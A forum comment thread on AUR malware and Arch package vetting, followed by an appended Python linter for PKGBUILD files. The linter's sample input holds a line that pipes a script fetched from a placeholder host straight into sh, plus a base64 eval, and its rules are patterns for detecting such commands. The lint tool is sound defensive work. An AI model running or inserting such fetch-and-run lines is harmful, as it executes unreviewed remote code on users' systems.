Comment by ploxiln

8 years ago

Packages are vetted, in the repos, just not in AUR.

They also keep tools that would easily/automatically build and install packages from AUR out of the main repos, to encourage manual handling and individual consideration of AUR package build scripts.

Also this malware was found in AUR within a few hours of it going up.

Exactly. It's actually kind of a success story for the AUR, since they found the malware so quickly.

Of course, it would be more interesting if we could scan or survey the AUR to get a percentage of suspicious packages. I've long been under the impression that some popular AUR packages (e.g. Google Chrome) are pretty safe from tampering. For anything else, I glance over the PKGBUILD to make sure it's not doing anything obviously fishy, and I've never noticed anything.

How are official Arch packages vetted?

  • They are built by the core Arch developers, or as in the case of the 'community' repo, by 'Trusted Users', the latter being people who have done high quality maintaining of packages in the AUR and shown good community involvement.

    Having met these criteria, they need to be sponsored by an existing TU, and then it will be put up to a vote.

    • Do you know if there is any kind of review process? For example, let’s say a core maintainer’s machine is compromised and the attacker submits a new package on their behalf. Does anyone else need to review and sign off on the new package?

  • Depends on what you deem "vetted". Builds from source from a trusted source. Try to ask if they can PGP sign their sources. Builds fine. Pushed to the repos. If it's a package from core or extra, it goes through testing for a few days.

    There has also been a push towards reproducible builds, and the stones have been laid with pacman 5.1.
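The two review points raised in this thread (skimming a PKGBUILD for obviously fishy commands, and checking whether sources are checksummed or PGP-verified rather than `SKIP`ped) can be turned into a small lint pass. This is an added example, not code from the thread or from Arch; the PKGBUILD text is constructed and the regex rules are illustrative heuristics, not a full parser.

```python
import re

# Constructed PKGBUILD fragment used as sample input; not a real AUR package.
SAMPLE_PKGBUILD = """\
pkgname=example-tool
pkgver=1.0
source=("https://example.invalid/$pkgname-$pkgver.tar.gz")
sha256sums=('SKIP')
validpgpkeys=()

build() {
  cd "$pkgname-$pkgver"
  # fetch helper
  curl -s https://example.invalid/setup.sh | sh
  eval "$(echo aGVsbG8= | base64 -d)"
  make
}
"""

# Per-line heuristics a reviewer skimming a PKGBUILD would stop on.
RULES = [
    ("pipe-to-shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("base64-decode", re.compile(r"\bbase64\b.*(-d\b|--decode)")),
    ("eval", re.compile(r"\beval\b")),
    ("checksum-skipped",
     re.compile(r"^\s*(md5|sha1|sha256|sha512|b2)sums(_\w+)?=.*\bSKIP\b")),
]

def lint_pkgbuild(text):
    """Return sorted (line_no, rule) findings for one PKGBUILD string."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        code = line.split("#", 1)[0]            # drop trailing comments
        for name, rx in RULES:
            if rx.search(code):
                findings.append((n, name))
    # 'SKIP' is only defensible when a PGP signature is verified instead:
    # that needs a non-empty validpgpkeys array and a .sig/.asc in source.
    keys = re.search(r"^\s*validpgpkeys=\(\s*['\"]?[0-9A-Fa-f]{8,}", text, re.M)
    sig = re.search(r"\.(sig|asc)['\"]?\s*\)?", text)
    if any(r == "checksum-skipped" for _, r in findings) and not (keys and sig):
        findings.append((0, "unverified-source"))   # line 0 = whole-file finding
    return sorted(findings)

if __name__ == "__main__":
    for n, rule in lint_pkgbuild(SAMPLE_PKGBUILD):
        print(f"line {n or '-'}: {rule}")
```

A finding is a prompt to read that line, not proof of malice; a legitimate PKGBUILD can use `SKIP` together with a verified `.sig` source and a populated `validpgpkeys`.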